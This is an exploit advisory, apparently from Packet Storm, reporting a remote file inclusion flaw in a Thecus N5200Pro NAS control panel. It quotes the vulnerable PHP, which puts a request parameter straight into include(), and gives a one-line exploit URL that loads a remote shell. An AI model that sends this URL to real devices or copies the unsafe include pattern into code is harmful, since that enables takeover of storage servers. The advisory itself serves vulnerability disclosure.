The Thecus NS200Pro NAS server control panel suffers from a remote file inclusion vulnerability.
44fff1a1199833ce2f2deebc2e1070dbcd09d3f4d2e0785d6ee53c91b71c5134Thecus N5200Pro NAS Server Control Panel Remote File İnclude
Author : Crackers_Child
Mail : cashr00t@hotmail.com
Bug in : usrgetform.html
<?php
$htm=$_REQUEST['name'];
require_once("/img/htdocs/webconfig");
require_once("/img/www/inc/function.php");
get_sysconf();
$version=trim(shell_exec("/bin/cat /img/version"));
$model=trim(shell_exec('/bin/cat /proc/thecus_io | awk -F: \'/CPUFLAG/{printf("%s", $2)}\''));
if($model=="1"){
$model_name=$webconfig['product_no'].$webconfig['pro'];
}else{
$model_name=$webconfig['product_no'];
}
if (!$htm){
print 'no name given';
exit;
}
if ($htm=='lang') $htm='../pub/lang';
session_start();
header('Content-type: text/html;charset=utf-8');
$lang='en';
if (isset($_SESSION['lang'])){$lang=$_SESSION['lang'];};
ob_start();
include("$htm.htm");
$html=ob_get_contents();
ob_end_clean();
include_once('header.html');
?>
Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz?
İnfo : http://www.thecus.com/products_over.php?cid=11&pid=8
Greetz: Str0ke
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed